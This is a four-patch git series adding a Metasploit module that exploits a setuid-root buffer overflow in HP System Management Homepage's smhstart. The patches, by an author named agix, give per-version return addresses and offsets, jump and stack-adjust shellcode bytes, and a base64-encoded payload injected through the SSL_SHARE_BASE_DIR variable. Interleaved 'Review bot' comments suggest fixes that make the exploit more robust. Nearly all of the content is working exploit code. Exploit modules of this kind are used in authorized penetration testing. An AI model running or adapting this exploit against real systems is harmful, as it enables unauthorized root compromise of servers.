From 30111e3d8b810398f973ac02cf82cc136021a065 Mon Sep 17 00:00:00 2001
From: agix
Date: Sun, 31 Mar 2013 13:04:34 +0200
Subject: [PATCH 1/4] hpsmh smhstart local exploit BOF
---
 modules/exploits/linux/local/hp_smhstart.rb | 89 +++++++++++++++++++++
 1 file changed, 89 insertions(+)
 create mode 100644 modules/exploits/linux/local/hp_smhstart.rb
diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb
new file mode 100644
index 0000000000..d6a52b92f6
--- /dev/null
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/local/linux_kernel'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/local/unix'
+require 'msf/core/exploit/exe'
+
+#load 'lib/msf/core/post/file.rb'
+#load 'lib/msf/core/exploit/local/unix.rb'
+#load 'lib/msf/core/exploit/local/linux.rb'
+#load 'lib/msf/core/exploit/local/linux_kernel.rb'
+
+class Metasploit4 < Msf::Exploit::Local
+
+ include Msf::Exploit::EXE
+ include Msf::Post::File
+ include Msf::Post::Common
+
+ include Msf::Exploit::Local::Linux
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'HP System Management Homepage Local Privilege Escalation',
+ 'Description' => %q{
+ Versions of hpsmh <= 7.1.1 setuid root smhstart is vulnerable to local buffer overflow in SSL_SHARE_BASE_DIR env variable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'agix' #@agixid
+ ],
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Payload' =>
+ {
+ 'Space' => 227,
+ 'BadChars' => "\x00\x22"
+ },
+ 'References' =>
+ [
+ ['OSVDB', '91812'] #not exactly but there is none...
+ ],
+ 'Targets' =>
+ [
+ [ 'Hpsmh 7.1.1',
+ {
+ 'Arch' => ARCH_X86,
+ 'CallEsp' => 0x080c86eb, #call esp
+ 'Offset' => 64
+ }
+ ],
+ [ 'Hpsmh 7.1.2',
+ {
+ 'Arch' => ARCH_X86,
+ 'CallEsp' => 0x080c8b9b, #call esp
+ 'Offset' => 64
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => "Mar 30 2013",
+ }
+ ))
+ register_options([
+ OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
+ ], self.class)
+ end
+
+ def exploit
+ pl = payload.encoded
+ padding = rand_text_alpha(target['Offset'])
+ ret = [target['CallEsp']].pack('V')
+ exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}")
+ cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
+ puts cmd_exec("#{datastore['smhstartDir']}/smhstart")
+ end
+
+end
From 7359151c1493e540f669260d123781f92d89ea5f Mon Sep 17 00:00:00 2001
From: agix
Date: Tue, 2 Apr 2013 13:25:31 +0200
Subject: [PATCH 2/4] decrement esp to fix crash in the middle of shellcode
---
 modules/exploits/linux/local/hp_smhstart.rb | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb
index d6a52b92f6..21c958cf28 100644
--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Local
 ],
 'Platform' => [ 'linux' ],
 'Arch' => [ ARCH_X86 ],
- 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'SessionTypes' => [ 'shell' ],
 'Payload' =>
 {
 'Space' => 227,
@@ -57,17 +57,21 @@ class Metasploit4 < Msf::Exploit::Local
 {
 'Arch' => ARCH_X86,
 'CallEsp' => 0x080c86eb, #call esp
- 'Offset' => 64
+ 'Offset' => 58
 }
 ],
 [ 'Hpsmh 7.1.2',
 {
 'Arch' => ARCH_X86,
 'CallEsp' => 0x080c8b9b, #call esp
- 'Offset' => 64
+ 'Offset' => 58
 }
 ],
 ],
+ 'DefaultOptions' =>
+ {
+ 'PrependSetuid' => true
+ },
 'DefaultTarget' => 0,
 'DisclosureDate' => "Mar 30 2013",
 }
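Review bot: Inside `def exploit` the local variable `exploit` shadows the method of the same name, which makes the body harder to read; renaming it, e.g. `buf = Rex::Text.encode_base64(...)`, keeps the two apart (patches 2 and 3 keep the same local name). The smhstart path is built by interpolation on an option whose default already ends in a slash, so the launched command reads `/opt/hp/hpsmh/sbin//smhstart`; `File.join(datastore['smhstartDir'], 'smhstart')` normalises either spelling, and since the option value also reaches the shell unquoted, a directory containing spaces breaks the command. The OSVDB entry carries the comment `#not exactly but there is none...`; a reference the author knows does not match should be dropped or replaced with the vendor advisory rather than shipped.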
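Review bot: `SessionTypes` drops `meterpreter` without a comment, and the commit message only mentions the esp fix, so the reason is lost to the next maintainer. Presumably the module depends on the `export SSL_SHARE_BASE_DIR=...` issued in one `cmd_exec` call still being set when the next call launches smhstart, which holds for a persistent shell session but not where each command runs in a fresh process; if that is the reason, a comment such as `# shell only: the exported variable must survive between cmd_exec calls` on this line would record it.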
@@ -81,9 +85,9 @@ class Metasploit4 < Msf::Exploit::Local
 pl = payload.encoded
 padding = rand_text_alpha(target['Offset'])
 ret = [target['CallEsp']].pack('V')
- exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}")
+ exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
 cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
- puts cmd_exec("#{datastore['smhstartDir']}/smhstart")
+ cmd_exec("#{datastore['smhstartDir']}/smhstart")
 end
 
 end
From 60dfece55c928c81cd0c4f55692e2b5c83250dd3 Mon Sep 17 00:00:00 2001
From: agix
Date: Wed, 3 Apr 2013 13:46:56 +0200
Subject: [PATCH 3/4] add opcode description
---
 modules/exploits/linux/local/hp_smhstart.rb | 22 ++++++++++-----------
 1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb
index 21c958cf28..3f3fda3b93 100644
--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -8,18 +8,9 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
-require 'msf/core/post/file'
-require 'msf/core/post/linux/priv'
-require 'msf/core/exploit/local/linux_kernel'
 require 'msf/core/exploit/local/linux'
-require 'msf/core/exploit/local/unix'
 require 'msf/core/exploit/exe'
 
-#load 'lib/msf/core/post/file.rb'
-#load 'lib/msf/core/exploit/local/unix.rb'
-#load 'lib/msf/core/exploit/local/linux.rb'
-#load 'lib/msf/core/exploit/local/linux_kernel.rb'
-
 class Metasploit4 < Msf::Exploit::Local
 
 include Msf::Exploit::EXE
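Review bot: Dropping `puts` now discards the output of the final `cmd_exec` entirely, so if smhstart is missing, not executable or exits with an error the operator gets no feedback and the module reports nothing. Keeping the result and emitting it through the module's own channel, e.g. `out = cmd_exec("#{datastore['smhstartDir']}/smhstart")` followed by `vprint_status(out) unless out.empty?`, preserves the diagnostics without writing to the console the way `puts` did. A `print_status` line before the launch would also leave a record in the module log that the binary was executed.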
@@ -85,8 +76,17 @@ class Metasploit4 < Msf::Exploit::Local
 pl = payload.encoded
 padding = rand_text_alpha(target['Offset'])
 ret = [target['CallEsp']].pack('V')
- exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
- cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
+ exploit = pl
+ exploit << ret
+ exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11
+ exploit << "\xe9\x0e\xff\xff\xff" # jmp => begining of pl
+ exploit << padding
+ exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
+ id=cmd_exec("id -un")
+ if id!="hpsmh"
+ fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this")
+ end
+ cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
 cmd_exec("#{datastore['smhstartDir']}/smhstart")
 end
 
From b947dc71e918b7cf041f1c8d57eb8df34871e0d0 Mon Sep 17 00:00:00 2001
From: agix
Date: Wed, 3 Apr 2013 13:47:57 +0200
Subject: [PATCH 4/4] english :) "must be"
---
 modules/exploits/linux/local/hp_smhstart.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb
index 3f3fda3b93..8920e8f580 100644
--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -84,7 +84,7 @@ class Metasploit4 < Msf::Exploit::Local
 exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
 id=cmd_exec("id -un")
 if id!="hpsmh"
- fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this")
+ fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
 end
 cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
 cmd_exec("#{datastore['smhstartDir']}/smhstart")
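Review bot: `exploit = pl` aliases the String returned by `payload.encoded` rather than copying it, so every `exploit << ...` on the following lines mutates that object in place; if the framework keeps the encoded payload around between runs, the retained copy is silently extended, and `exploit = pl.dup` removes the question. The new guard compares the raw output of `cmd_exec("id -un")` with `"hpsmh"`, and that output may carry trailing whitespace depending on the session type, so `if id.strip != "hpsmh"` is the more robust form; spacing the assignment and comparison as `id = cmd_exec("id -un")` and `if id != "hpsmh"` also matches the rest of the file. The comment on the `\xe9` line misspells "beginning". The enclosing `def exploit` starts above the hunk.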